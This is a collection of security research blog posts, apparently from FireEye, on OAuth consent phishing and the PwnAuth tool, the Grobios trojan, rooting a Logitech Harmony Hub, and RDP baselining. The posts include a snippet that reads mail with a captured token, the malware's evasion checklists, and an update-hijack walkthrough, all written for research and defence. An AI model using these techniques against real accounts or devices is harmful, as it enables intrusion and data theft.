OAuth 2.0 is described as "An open protocol to allow secure authorization in a simple and standard method from web, mobile and desktop applications..." It has become the de facto protocol that major Internet companies such as Amazon, Google, Facebook, and Microsoft use to facilitate granting third-party applications access to user data. An application that accesses your Microsoft OneDrive to allow for easy file sharing is an example of an application that would leverage OAuth.

Let’s use an application accessing OneDrive as an example to define some roles in an OAuth authorization flow:

The Application, or "Client"

The third-party application that is requesting access. In this case, the application that wishes to access your OneDrive files is the "Client."

The API "Resource"

The target application the "Client" wishes to access. In this case, the Microsoft OneDrive API endpoint is the "Resource."

The "Resource Owner"

The person granting access to a portion of their account. In this case, you.

The Authorization Server

The Authorization Server presents the interface that the Resource Owner uses to give or deny consent. The server could be the same as the API Resource or a different component. In this case, the Microsoft login portal is the "Authorization Server".

Scope

The Scope is defined as the type of access that the third-party application is requesting. Most API Resources will define a set of scopes that applications can request. This is similar to the permissions that an Android phone application would request on installation. In this example, the application may request access to your OneDrive files and user profile.

OAuth 2.0 provides several different authorization "grant types" to facilitate the different applications that we, as users, interact with. For the purpose of this post, we are interested in the "Authorization Code" grant type, which is used by web applications implementing OAuth. The following is an example authorization flow:

1.  A "Consent" link is created that directs the Resource Owner to the Authorization Server with parameters identifying the Application and the scopes requested.

https://login.microsoftonline.com/auth
?response_type=code
&client_id=123456789
&redirect_uri=https%3A%2F%2Fexample-app.com%2Fcallback
&scope=mail.read+offline_access

2.  The Resource Owner will be presented with an authorization prompt, stating the application name and requested scopes. The Resource Owner has the option to approve or deny this authorization request.

3.  Upon approval, the Authorization Server redirects back to the Application's redirect_uri with an authorization code.

4.  The Application then exchanges the authorization code for an access token from the Authorization Server. The token response resembles the following:

HTTP/1.1 200 OK
Content-Type: application/json
Cache-Control: no-store
Pragma: no-cache
   
{
"access_token":"aMQe28fhjad8fasdf",
"token_type":"bearer",
"expires_in":3600,
"refresh_token":"OWWGE3YmIwOGYzYTlmM2YxNmMDFkNTVk",
"scope":"mail.read+offline_access"
}

Access tokens can be used for a set duration of time to access the user’s data from the API Resource, without any further action by the Resource Owner.
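To make step 4 concrete, the hedged sketch below performs a generic authorization code exchange with the requests library. The token endpoint and client values are placeholders rather than any specific provider's documented endpoint, but the parameter names are the standard OAuth 2.0 ones:

import requests

TOKEN_URL = "https://login.example.com/oauth2/token"  # placeholder token endpoint

response = requests.post(TOKEN_URL, data={
    "grant_type": "authorization_code",
    "code": "AUTH_CODE_FROM_REDIRECT",            # the code returned in step 3
    "redirect_uri": "https://example-app.com/callback",
    "client_id": "123456789",
    "client_secret": "CLIENT_SECRET",
})
tokens = response.json()
access_token = tokens["access_token"]            # used against the API Resource
refresh_token = tokens.get("refresh_token")      # present when offline_access was granted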

Room For Abuse

OAuth applications provide an ideal vector through which attackers could compromise a target and harvest confidential data such as email, contacts, and files. An attacker could create a malicious application and use the obtained access tokens to retrieve victims' account data via the API Resource. The access tokens do not require knowledge of the user's password, and bypass any two-factor enforcement. Further, the only way to remove an attacker's access is to explicitly revoke access to the OAuth application. In order to obtain OAuth tokens, an attacker would need to convince a victim to click a "Consent link" and approve the application via social engineering. Because all victim interaction is on sites owned by the legitimate Resource Provider (e.g. Microsoft), it can be hard for an untrained user to differentiate between a legitimate OAuth application and a malicious one.
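To illustrate why this is attractive to an attacker, the hedged sketch below uses a captured bearer token to list messages through the Microsoft Graph API. No password and no second factor are involved; only the token matters:

import requests

access_token = "CAPTURED_ACCESS_TOKEN"  # placeholder for a token obtained via consent
headers = {"Authorization": "Bearer " + access_token}

resp = requests.get("https://graph.microsoft.com/v1.0/me/messages?$top=10", headers=headers)
for message in resp.json().get("value", []):
    print(message.get("subject"), "-", message.get("from", {}).get("emailAddress", {}).get("address"))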

Though likely not the first instance of such campaigns, OAuth abuse first came to the media's attention during the 2016 presidential election. FireEye wrote about APT28's usage of OAuth abuse to gain access to emails of U.S. politicians in our M-TRENDS 2017 report. Since then, FireEye has seen the technique spread to commodity worms seeking to spread across Gmail.

PwnAuth

PwnAuth is a web application framework I wrote to make it easier for organizations to test their ability to detect and respond to OAuth abuse campaigns. The web application provides penetration testers with an easy-to-use UI to manage malicious OAuth applications, store gathered OAuth tokens, and interact with API Resources. The application UI and framework are designed to be easily extendable to other API Resources through the creation of additional modules. While any cloud environment that allows OAuth applications could be targeted, currently PwnAuth ships with a module to support malicious Office 365 applications that will capture OAuth tokens and facilitate interaction with the Microsoft Graph API using those captured tokens. The Office 365 module itself could be further extended, but currently provides the following:

  • Reading mail messages
  • Searching the user's mailbox
  • Reading the user's contacts
  • Downloading messages and attachments
  • Searching OneDrive and downloading files
  • Sending messages on behalf of the user

The interface is designed to be intuitive and user-friendly. The first step to using PwnAuth would be to create a Microsoft Application. That information must then be entered into PwnAuth (Figure 1).


Figure 1: Importing a Microsoft App into PwnAuth

Once configured, you can use the generated "Authorization URL" to phish potential victims. When clicked, PwnAuth will capture victim OAuth tokens for later use. An example victim listing is shown in Figure 2.


Figure 2: Listing victim users in PwnAuth

Once PwnAuth has captured a victim's OAuth token, you can begin to access their data. For example, you could use PwnAuth to query the victim's mailbox for all messages containing the string "password" (Figure 3).


Figure 3: Searching the mailbox of a victim

See the GitHub wiki for more information on usage.

Mitigations

Our FireEye technology stack includes network-based signatures to detect potentially malicious OAuth consent URLs. Attackers tend to include certain scopes in malicious apps that can be detected and flagged. Organizations with social engineering training programs can add OAuth abuse scenarios to their existing programs to better educate users about this attack vector. Additionally, organizations can take steps to limit the potential impact of malicious OAuth applications and increase their detection capabilities. The options available to an organization vary greatly depending on the API Resource, but, in general, include:

  • Limit the API scopes third-party apps can request.
  • Disable third-party apps in an organization.
  • Implement a whitelist or blacklist for applications.
  • Query an organization's user base for all consented applications.
  • Log any user consent events and report suspicious activity.

Office 365 in particular offers some additional options for administrators.

I have created a collection of scripts to assist administrators in hunting for malicious OAuth applications in cloud environments. Currently there is a script to investigate Office 365 tenants, with plans to add support for other cloud environments.
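As a separate, hedged illustration of what such hunting can look like (this is not one of the scripts referenced above), delegated consent grants in an Office 365 tenant can be enumerated through the Microsoft Graph oauth2PermissionGrants endpoint, given a token with sufficient directory read permissions:

import requests

admin_token = "ADMIN_GRAPH_TOKEN"  # placeholder for an appropriately privileged token
headers = {"Authorization": "Bearer " + admin_token}

url = "https://graph.microsoft.com/v1.0/oauth2PermissionGrants"
while url:
    page = requests.get(url, headers=headers).json()
    for grant in page.get("value", []):
        # clientId is the consented application's service principal; scope lists the permissions.
        print(grant["clientId"], grant.get("principalId"), grant.get("scope"))
    url = page.get("@odata.nextLink")  # follow paging until all grants are listed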

Conclusion

OAuth abuse attacks are a dangerous and non-traditional phishing technique that attackers can use to gain access to an organization's confidential data. As we move more services to the cloud, organizations should be careful to lock down third-party application access and ensure that their monitoring and detection strategy covers application consent grants. Organizations and security professionals can use PwnAuth to test their ability to detect and respond to this new type of attack.

Head over to our GitHub and start using PwnAuth today.

A Deep Dive Into RIG Exploit Kit Delivering Grobios Trojan

As discussed in previous blogs, exploit kit activity has been on the decline since the latter half of 2016. However, we still periodically observe significant developments in this space, and we have been tracking interesting ongoing activity involving RIG Exploit Kit (EK). Although the volume of its traffic observed in the wild has been on the decline, RIG EK remains active, with a wide range of associated crimeware payloads.

In this recent finding, RIG EK was observed delivering a Trojan named Grobios. This blog post will discuss this Trojan in depth with a focus on its evasion and anti-sandbox techniques, but first let’s take a quick look at the attack flow. Figure 1 shows the entire infection chain for the activity we observed.


Figure 1: Infection chain

We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain latorre[.]com[.]au, which had a malicious iframe injected into it (Figure 2).


Figure 2: Malicious Iframe injected in latorre[.]com

The iframe loads a malvertisement domain, which communicates over SSL (certificate shown in Figure 3) and leads to the RIG EK landing page that loads the malicious Flash file (Figure 4).


Figure 3: Malicious SSL flow


Figure 4: RIG EK SWF download request

When opened, the Flash file drops the Grobios Trojan. Figure 5 shows the callback traffic from the Grobios Trojan.


Figure 5: Grobios callback

Analysis of the Dropped Malware

Grobios uses various techniques to evade detection and gain persistence on the machine, making it difficult to uninstall or render inactive on the victim machine. It also uses multiple anti-debugging, anti-analysis and anti-VM techniques to hide its behavior. After successful installation on the victim machine, it connects to its command and control (C2) server, which responds with commands.

In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx. The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of the API functions it calls, parsing the PE headers of loaded DLLs to match function names to their hashes. The malware also uses stack strings. Figure 6 shows an example of the malware calling Windows APIs using their hashes.


Figure 6: An example of calling WinAPI using their hashes.
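When the hashing routine has been recovered from the binary, analysts typically resolve such hashes by brute force: run a dictionary of candidate API, process, or driver names through the same routine and compare the results against the hardcoded values. The sketch below shows the general approach with a deliberately hypothetical hash function; it is not Grobios' actual algorithm, which must be lifted from the sample:

def hash_name(name):
    # Placeholder djb2-style routine; replace with the algorithm recovered from the binary.
    value = 5381
    for char in name.lower():
        value = ((value << 5) + value + ord(char)) & 0xFFFFFFFF
    return value

def crack(target_hashes, wordlist):
    lookup = {hash_name(word): word for word in wordlist}
    return {hex(target): lookup.get(target, "<unknown>") for target in target_hashes}

candidates = ["vmware.exe", "wireshark.exe", "procexp.exe", "ollydbg.exe"]
print(crack([hash_name("wireshark.exe")], candidates))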

Loading

The malware sample starts a copy of itself, which then injects its code into svchost.exe or IEXPLORE.EXE, depending on the user privilege level. Both the parent and child processes exit once the injection is complete, leaving only svchost.exe or IEXPLORE.EXE running. Figure 7 shows the process tree.


Figure 7: Process tree of the malware

Persistence

The malware has an aggressive approach to persistence. It employs the following techniques:

  • It drops a copy of itself into the %APPDATA% folder, masquerading as a version of legitimate software installed on the victim machine. It creates an Autorun registry key and a shortcut in the Windows Startup folder. During our analysis, it dropped itself to the following path:

%APPDATA%\Google\v2.1.13554\<RandomName>.exe. 

The path can vary depending on the folders the malware finds in %APPDATA%.

  • It drops multiple copies of itself in subfolders of a program at the path %ProgramFiles%/%PROGRAMFILES(X86)%,  again masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
  • It drops a copy of itself in the %Temp% folder, and creates a scheduled task to run it.

On an infected system, the malware creates two scheduled tasks, as shown in Figure 8.


Figure 8: Scheduled tasks created by the malware

The malware changes the Created, Modified, and Accessed times of all of its dropped copies to the Last Modified time of ntdll.dll. To bypass the “File Downloaded from the Internet” warning, the malware removes the :Zone.Identifier flag using the DeleteFile API, as shown in Figure 9.


Figure 9: Call to DeleteFileW to remove the :Zone.Identifier Flag from the dropped copy
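For defenders, the presence or absence of that mark-of-the-web is straightforward to check, because NTFS exposes it as an alternate data stream named Zone.Identifier. A minimal check on Windows might look like the following (the sample path is hypothetical):

import os

def has_motw(path):
    # The Zone.Identifier alternate data stream holds the "downloaded from the
    # Internet" marking; if it is missing, the file was never marked or the mark
    # was removed, as Grobios does with DeleteFile.
    try:
        with open(path + ":Zone.Identifier", "r") as stream:
            return "ZoneId" in stream.read()
    except OSError:
        return False

print(has_motw(os.path.expandvars(r"%TEMP%\sample.exe")))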

An interesting behavior of this malware is that it protects its copy in the %TEMP% folder using EFS (Windows Encrypted File System), as seen in Figure 10.


Figure 10: Cipher Command Shows the Malware Copy Protected by EFS

Detecting VM and Malware Analysis Tools

Just before connecting to the C2, the malware performs a series of checks to detect VM and malware analysis environments. It can detect almost all well-known VM software, including Xen, QEMU, VMware, VirtualBox, Hyper-V, and so on. The following is the list of checks it performs on the victim system:

  • Using the FindWindowEx API, it checks whether any of the analysis tools in Table 1 are running on the system.

Analysis Tools: PacketSniffer, FileMon, WinDbg, Process Explorer, OllyDbg, SmartSniff, cwmonitor, Sniffer, Wireshark

Table 1: Analysis tools detected by malware

  • The malware contains a list of hashes of blacklisted process names. It checks whether the hash of any running process matches a hash on the blacklist, as shown in Figure 11.


Figure 11: Check for blacklisted processes

We were able to crack the hashes of the blacklisted processes shown in Table 2.

Hash           Process
283ADE38h      vmware.exe
8A64214Bh      vmount2.exe
13A5F93h       vmusrvc.exe
0F00A9026h     vmsrvc.exe
0C96B0F73h     vboxservice.exe
0A1308D40h     vboxtray.exe
0E7A01D35h     xenservice.exe
205FAB41h      joeboxserver.exe
6F651D58h      joeboxcontrol.exe
8A703DD9h      wireshark.exe
1F758DBh       Sniffhit.exe
0CEF3A27Ch     sysAnalyzer.exe
6FDE1C18h      Filemon.exe
54A04220h      procexp.exe
0A17C90B4h     Procmon.exe
7215026Ah      Regmon.exe
788FCF87h      autoruns.exe
0A2BF507Ch
0A9046A7Dh

Table 2: Blacklisted processes

  • The malware enumerates registry keys in the following paths to see if they contain the words xen or VBOX:
    • HKLM\HARDWARE\ACPI\DSDT
    • HKLM\HARDWARE\ACPI\FADT
    • HKLM\HARDWARE\ACPI\RSDT
  • It checks whether services installed on the system contain any of the keywords in Table 3:

vmmouse, vmdebug, vmicexchange, vmicshutdown, vmicvss, vmicheartbeat, msvmmouf, VBoxMouse, vpcuhub, vpc-s3, vpcbus, vmx86, vmware, VMMEMCTL, VMTools, XenVMM, xenvdb, xensvc, xennet6, xennet, xenevtchn, VBoxSF, VBoxGuest

Table 3: Blacklisted service names

  • It checks whether the username contains any of these words: MALWARE, VIRUS, SANDBOX, MALTEST
  • It contains a list of hashes of blacklisted driver names. It traverses the Windows driver directory %WINDIR%\system32\drivers\ using the FindFirstFile/FindNextFile APIs and checks whether the hash of any driver name matches a blacklisted hash, as shown in Table 4.

Hash           Driver
0E687412Fh     hgfs.sys
5A6850A1h      vmhgfs.sys
0CA5B452h      prleth.sys
0F9E3EE20h     prlfs.sys
0E79628D7h     prlmouse.sys
68C96B8Ah      prlvideo.sys
0EEA0F1C2h     prl_pv32.sys
443458C9h      vpcs3.sys
2F337B97h      vmsrvc.sys
4D95FD80h      vmx86.sys
0EB7E0625h     vmnet.sys

Table 4: Hashes of blacklisted driver names

  • It calculates the hash of ProductId and matches it with three blacklisted hashes to detect public sandboxes, shown in Table 5.

Hash           Product ID                   Sandbox Name
4D8711F4h      76487-337-8429955-22614      Anubis Sandbox
7EBAB69Ch      76487-644-3177037-23510      CWSandbox
D573F44D       55274-640-2673064-23950      Joe Sandbox

Table 5: Blacklisted product IDs

  • The malware calculates the hashes of loaded module (DLL) names and compares them against the list of blacklisted module name hashes shown in Table 6. These are DLLs commonly loaded into a process that is being debugged, such as dbghelp.dll and api_log.dll.

6FEC47C1h, 6C8B2973h, 0AF6D9F74h, 49A4A30h, 3FA86C7Dh

Table 6: Blacklisted module name hashes

Figure 12 shows the flow of code that checks for blacklisted module hashes.


Figure 12: Code checks for blacklisted module hashes

  • It checks whether registry keys at the paths HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum and HKLM\SYSTEM\ControlSet001\Services\Disk\Enum contain any of these words: QEMU, VBOX, VMWARE, VIRTUAL
  • It checks whether registry keys at the paths HKLM\SOFTWARE\Microsoft and HKLM\SOFTWARE contain these words: VirtualMachine, vmware, Hyber-V
  • It checks whether the system BIOS version at the registry path HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion contains these words: QEMU, BOCHS, VBOX
  • It checks whether the video BIOS version at the registry path HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion contains the VIRTUALBOX substring.
  • It checks whether the registry key at the path HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier contains any of these words: QEMU, vbox, vmware
  • It checks whether the registry key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions exists on the system.

Network Communication

The malware contains two hardcoded, obfuscated C2s. After de-obfuscating the C2 URLs, it generates a random string of 20 characters, appends it to the end of the URL, and requests commands. Before executing any commands, the malware verifies the identity of the C2: it calculates the hash of 4 bytes of data using the CALG_MD5 algorithm, then uses the Base64 data from the CERT command as a public key in CryptVerifySignature to verify the hash signature (Figure 13). If the signature is verified, the malware executes the commands.


Figure 13: Malware verifies the C2 hash
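The malware performs this check with the Windows CryptoAPI. As a rough Python analogue of the same idea (illustrative only, since CryptoAPI public key blob formats and signature byte ordering differ from standard tooling), the verification amounts to checking an RSA signature over an MD5 hash with a server-supplied public key:

import base64
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.serialization import load_der_public_key

def verify_c2(cert_b64, data, signature):
    # cert_b64 mirrors the Base64 blob delivered by the CERT command; MD5 mirrors
    # the malware's CALG_MD5 choice. PKCS#1 v1.5 padding is assumed here.
    public_key = load_der_public_key(base64.b64decode(cert_b64))
    try:
        public_key.verify(signature, data, padding.PKCS1v15(), hashes.MD5())
        return True
    except InvalidSignature:
        return False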

During our initial analysis, we found that the malware supports the commands shown in Table 7. 

Command                     Description
CERT <Base64 data>          Contains the data used to verify the identity of the C2
CONNECT <IP:Port>           Connect to the given host for further commands
DISCONNECT                  Close all connections
WAIT <Number of seconds>    Wait the given number of seconds before executing the next command
REJECT                      Effectively a NOP; move on to the next command after waiting five seconds

Table 7: Commands supported by the malware

Figure 14 shows commands being issued by the C2 server.


Figure 14: Commands issued by the C2 server

Conclusion

Despite the decline in activity, exploit kits continue to put users at risk, especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye Network Security blocks delivery at the infection point.

Indicators of Compromise (IOCs)

  • 30f03b09d2073e415a843a4a1d8341af
  • 99787d194cbd629d12ef172874e82738
  • 169.239.129[.]17
  • grobiosgueng[.]su

Acknowledgments 

We acknowledge Mariam Muntaha for her contribution to the blog regarding malicious traffic analysis.

Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World

Introduction

FireEye’s Mandiant Red Team recently discovered vulnerabilities present on the Logitech Harmony Hub Internet of Things (IoT) device that could potentially be exploited, resulting in root access to the device via SSH. The Harmony Hub is a home control system designed to connect to and control a variety of devices in the user’s home. Exploitation of these vulnerabilities from the local network could allow an attacker to control the devices linked to the Hub, as well as use the Hub as an execution space to attack other devices on the local network. Because the Harmony Hub’s device list includes support for smart locks, smart thermostats, and other smart home devices, these vulnerabilities present a very high risk to users.

FireEye disclosed these vulnerabilities to Logitech in January 2018. Logitech was receptive and has coordinated with FireEye to release this blog post in conjunction with a firmware update (4.15.96) to address these findings.

The Red Team discovered the following vulnerabilities:

  • Improper certificate validation
  • Insecure update process
  • Developer debugging symbols left in the production firmware image
  • Blank root user password

The Red Team used a combination of the vulnerabilities to gain administrative access to the Harmony Hub. This blog post outlines the discovery and analysis process, and demonstrates the necessity of rigorous security testing of consumer devices – particularly as the public places an increasing amount of trust in devices that are not just connected to home networks, but also give access to many details about the daily lives of their users.

Device Analysis

Device Preparation

Publicly available research indicated the presence of a universal asynchronous receiver/transmitter (UART) interface on some of the test points on the Harmony Hub. We soldered jumper wires to the test pads, which allowed us to connect to the Harmony Hub using a TTL to USB serial cable. Initial analysis of the boot process showed that the Harmony Hub booted via U-Boot 1.1.4 and ran a Linux kernel (Figure 1).


Figure 1: Initial boot log output from UART interface

After this point in the boot process, the console stopped returning output because the kernel was not configured with any console interfaces. We reconfigured the kernel boot parameters in U-Boot to inspect the full boot process, but no useful information was recovered. Furthermore, because the UART interface was configured to only transmit, no further interaction could be performed with the Harmony Hub on this interface. Therefore, we shifted our focus to gaining a better understanding of the Linux operating system and associated software running on the Harmony Hub.

Firmware Recovery and Extraction

The Harmony Hub is designed to pair with a companion Android or iOS application over Bluetooth for its initial configuration. We created a wireless network with hostapd and installed a Burp Suite Pro CA certificate on a test Android device to intercept traffic sent by the Harmony mobile application to the Internet and to the Harmony Hub. Once initial pairing is complete, the Harmony application searches for Harmony Hubs on the local network and communicates with the Harmony Hub over an HTTP-based API.

Once connected, the Harmony application sends two different requests to Harmony Hub’s API, which cause the Harmony Hub to check for updates (Figure 2).


Figure 2: A query to force the Harmony Hub to check for updates

The Harmony Hub sends its current firmware version to a Logitech server to determine if an update is available (Figure 3). If an update is available, the Logitech server sends a response containing a URL for the new firmware version (Figure 4). Despite using a self-signed certificate to intercept the HTTPS traffic sent by the Harmony Hub, we were able to observe this process – demonstrating that the Harmony Hub ignores invalid SSL certificates.


Figure 3: The Harmony Hub checks for updates to its firmware


Figure 4: The server sends a response with a URL for the updated firmware

We retrieved this firmware and examined the file. After extracting a few layers of archives, the firmware can be found in the harmony-image.squashfs file. This filesystem image is a SquashFS filesystem compressed with LZMA, a common format for embedded devices. However, vendors often use old versions of squashfs-tools that are incompatible with more recent builds. We used the unsquashfs_all.sh script included in firmware-mod-kit to automate the process of finding the correct version of unsquashfs to extract the filesystem image (Figure 5).


Figure 5: Using firmware-mod-kit to extract the filesystem

With the filesystem contents extracted, we investigated some of the configuration details of the Harmony Hub’s operating system. Inspection revealed that various debug details were available in the production image, such as kernel modules that were not stripped (Figure 6).


Figure 6: Unstripped Linux kernel objects on the filesystem

Investigation of /etc/passwd showed that the root user had no password configured (Figure 7). Therefore, if we can enable the dropbear SSH server, we can gain root access to the Harmony Hub through SSH without a password.


Figure 7: /etc/passwd shows no password is configured for the root user

We observed that an instance of a dropbear SSH server will be enabled during initialization if the file /etc/tdeenable is present in the filesystem (Figure 8).


Figure 8: A dropbear SSH server is enabled by /etc/init.d/rcS script if /etc/tdeenable is present

Hijacking Update Process

During the initialization process, the Harmony Hub queries the GetJson2Uris endpoint on the Logitech API to obtain a list of URLs to use for various processes (Figure 9), such as the URL to use when checking for updated firmware or the URL to obtain information about updates to additional software packages.


Figure 9: The request to obtain a list of URL endpoints for various processes

We intercepted and modified the JSON object in the response from the server to point the GetUpdates member to our own IP address, as shown in Figure 10.


Figure 10: The modified JSON object member

Similar to the firmware update process, the Harmony Hub sends a POST request to the endpoint specified by GetUpdates containing the current versions of its internal software packages. The request shown in Figure 11 contains a sample request for the HEOS package.


Figure 11: The JSON request object containing the current version of the “HEOS” package

If the sysBuild parameter in the POST request body does not match the current version known by the server, the server responds with information about the new package version. For an undetermined reason, the Harmony Hub ignores this initial response and sends a second request. The second response contains multiple URLs pointing to the updated package, as shown in Figure 12.


Figure 12: The JSON response containing URLs for the software update

We downloaded and inspected the .pkg files listed in the response object, which are actually just ZIP archives. The archives contain a simple file hierarchy, as shown in Figure 13.


Figure 13: The .pkg archive file hierarchy

The manifest.json file contains information used to instruct the Harmony Hub’s update process on how to handle the archive’s contents (Figure 14).


Figure 14: The contents of the manifest.json file

The Harmony Hub’s update process executes the script provided by the installer parameter of the manifest if it is present within the archive. We modified this script, as shown in Figure 15, to create the /etc/tdeenable file, which causes the boot process to enable the SSH interface as previously described.


Figure 15: The modified update.sh file

We created a new malicious archive with the appropriate .pkg extension, which was hosted on a local web server. The next time the Harmony Hub checked for updates against the URL supplied in the modified GetJson2URIs response, we sent a modified response to point to this update. The Harmony Hub retrieved our malicious update package, and after rebooting the Harmony Hub, the SSH interface was enabled. This allowed us to access the device with the username root and a blank password, as shown in Figure 16.


Figure 16: The SSH interface was enabled after a reboot

Conclusion

As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Because the Harmony Hub, like many IoT devices, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack. However, Logitech worked with our team to quickly address the vulnerabilities with their current firmware, 4.15.96. Developers of the devices we place our trust in should be vigilant in removing potential attack vectors that could expose end users to security risks. We also want to share Logitech’s statement on the research and work by the Red Team:

"At Logitech, we take our customers’ security and privacy very seriously. In late January 2018, security research firm FireEye pointed out vulnerabilities that could impact Logitech Harmony Hub-based products*.

If a malicious hacker had already gained access to a Hub-users network, these vulnerabilities could be exploited. We appreciate the work that professional security research firms like FireEye provide when identifying these types of vulnerabilities on IoT devices.

As soon as FireEye shared their research findings with us, we reviewed internally and immediately started to develop firmware to address it. As of April 10, we have released firmware that addresses all of the vulnerabilities that were identified. For any customers who haven’t yet updated to firmware version 4.15.96, we recommend you check the MyHarmony software and sync your Hub-based remote and receive it. Complete directions on updating your firmware can be found here.

*Hub-based products include: Harmony Elite, Harmony Home Hub, Harmony Ultimate Hub, harmony Hub, Harmony Home Control, Harmony Pro, Harmony Smart Control, Harmony Companion, Harmony Smart Keyboard, Harmony Ultimate and Ultimate Home."

Establishing a Baseline for Remote Desktop Protocol

For IT staff and Windows power users, Microsoft Terminal Services Remote Desktop Protocol (RDP) is a beneficial tool that allows for the interactive use or administration of a remote Windows system. However, Mandiant consultants have also observed threat actors using RDP, with compromised domain credentials, to move laterally across networks with limited segmentation.

To understand how threat actors take advantage of RDP, consider the following example (and Figure 1):

  1. A staff member from the HR department working on his or her desktop inadvertently installs a malicious backdoor by interacting with a phishing email.
  2. The backdoor malware runs password stealing functionality from Mimikatz to obtain credentials stored in memory for any user accounts that have accessed the system.
  3. The backdoor creates a network tunnel to an attacker’s command and control (C2) server.
  4. The attacker logs on to the HR employee’s system with RDP through the network tunnel by using the compromised credentials.
  5. In pursuit of compromising financial information, the attacker uses Active Directory enumeration commands to identify domain-based systems used by the finance department.
  6. The attacker uses RDP and the compromised HR employee account to connect to a system in the finance department.
  7. The attacker uses Mimikatz to extract credentials on the finance system, resulting in access to  cached passwords for the finance employee who uses the system and an IT administrator who recently logged onto the system for troubleshooting.
  8. Using RDP, the attacker leverages the HR employee’s account, the finance employee’s account, and the IT administrator employee’s account to log onto additional systems in the environment.
  9. The attacker stages data onto the HR employee’s system.
  10. The attacker steals the files via the built-in RDP copy and paste functionality.


Figure 1: Example of a compromise that uses RDP for lateral movement

A best practice used to identify this type of activity is network baselining. To do this, an organization must first understand what is normal behavior for their specific environment, and then begin to configure detections based on unexpected patterns. Sample questions that can help determine practical detection techniques based on the aforementioned scenario include:

  1. Do our HR and/or finance employees typically use RDP?
  2. Do any of our HR employees RDP to a destination system in finance?
  3. Do any of our HR and/or finance employees RDP to multiple destination systems?
  4. Are the systems in our HR and/or finance departments used as source systems for RDP?
  5. Do our IT administrator accounts RDP from a source system that is not part of an IT network segment?
  6. Do any of our critical servers have logons from source systems that are not part of an IT network segment?
  7. Do any of our critical servers have RDP logons sourced from user accounts that are correlated to any of our HR and/or finance personnel?
  8. Is it expected for a single user account to initiate RDP connections from multiple source systems?

While it can take time to develop a customized process to baseline the scope of user accounts, source systems, and destination systems that leverage RDP in your organization’s environment, normalizing and reviewing this data will empower your staff with a deeper understanding of user account behavior and the ability to detect unexpected activity, so they can quickly begin investigating and triaging.

Tracking RDP through Event Logs

A first step and important resource for identifying your network’s typical behavior is event logs. RDP logons can generate file, event log, and registry artifacts on both the source and destination systems involved. Page 42 of JPCERT’s reference, “Detecting Lateral Movement through Tracking Event Logs,” details many artifacts that investigators may find on source and destination systems.

For the purpose of scalability, our baselining approach will focus on three high-fidelity logon events recorded on a destination system:

  • EID 21 and EID 25 within the “TerminalServices-LocalSessionManager” log, commonly located at “%systemroot%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx”
  • EID 4624 entries of Type 10 logons within the “Security” log, commonly located at “%systemroot%\System32\winevt\Logs\Security.evtx”

The EID 21 entry shown in Figure 2 is created on a destination system when a successful interactive local or remote logon event occurs.


Figure 2: EID 21 Example Structure

The EID 25 entry shown in Figure 3 is created on a destination system when it is reconnected to after a previous RDP session was not terminated through a proper user logout, for example, when the user closed the RDP window (which generates EID 24) rather than logging off through the Start menu (which generates EID 23).


Figure 3: EID 25 Example Structure

The EID 4624 entry is created on a destination system when a logon of any type occurs. For evidence of RDP authentication, we will focus on EID 4624 entries with Logon Type 10, as shown in Figure 4, which correspond to RDP authentications.


Figure 4: Type 10 EID 4624 Example Structure

These event log entries provide evidence of a successful RDP authentication from one system to another. For most security teams to collect this event log data, the logs must either be forwarded to an aggregation platform, such as a security information and event management (SIEM) platform, or collected using a forensic acquisition utility such as FireEye’s Endpoint Security (HX) appliance. Once extracted, the data must be processed and stacked for frequency analysis. The scope of this post is to generate metrics based on unique user accounts, source systems, and destination systems.

For both EID 21 and EID 25, the user account and source system are captured in the event log strings, while the destination system is the system that recorded the event. Note that the “Source Network Address” recorded within the log may be either a hostname or an IP address. Your data processor may benefit from mapping IP addresses and hostnames together, while keeping Dynamic Host Configuration Protocol (DHCP) leases in mind. Understanding which systems correlate to specific user accounts or business units will greatly benefit the analysis of the processed results. If your organization does not track this information, you should request that this documentation be created or captured within an asset management database for automated correlation.

Identifying Inconsistencies

Once RDP activity is baselined across your environment via the analysis of event logs, security analysts can then begin to identify RDP activity that deviates from business requirements and normalized patterns. Keep in mind that distinguishing between legitimate and anomalous RDP activity may take time.

Not only will DHCP logs prove useful when mapping IP address to hostnames, but documentation that associates systems and user accounts with specific business units can also help with reviewing and correlating observed RDP activity for suspicious or benign behavior. Any RDP activity inconsistent with expected business practices should be investigated. Additionally, RDP logons confirmed as benign should be noted in the baseline for future investigators.

Leveraging Metrics

By using SIEM correlation techniques, analysts can stack RDP activity by account, source system, and destination system to compute the following metrics, which will deepen the security staff’s understanding of RDP activity in your network:

  • source systems per user account
  • destination systems per user account
  • user accounts per each source system to destination system path
  • user accounts per each source system
  • user accounts per each destination system
  • source system to destination system paths per user account
  • total RDP logons per user account
  • total RDP logons per source system
  • total RDP logons per destination system
  • destination systems for each source system
  • source systems for each destination system

This list of metrics is not exhaustive and can be expanded by including timestamp metadata if desired.
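A hedged sketch of this stacking step is shown below. It assumes the event data has already been reduced to (user, source, destination) records; a SIEM query language would express the same aggregations natively:

from collections import Counter, defaultdict

# Example records extracted from EID 21/25/4624 events: (user, source, destination).
records = [
    ("hr_alice", "HR-WKSTN-01", "FIN-SRV-02"),
    ("it_admin", "IT-JUMP-01", "FIN-SRV-02"),
    ("hr_alice", "HR-WKSTN-01", "HR-SRV-01"),
]

logons_per_user = Counter(user for user, _, _ in records)
sources_per_user = defaultdict(set)
destinations_per_user = defaultdict(set)
for user, source, destination in records:
    sources_per_user[user].add(source)
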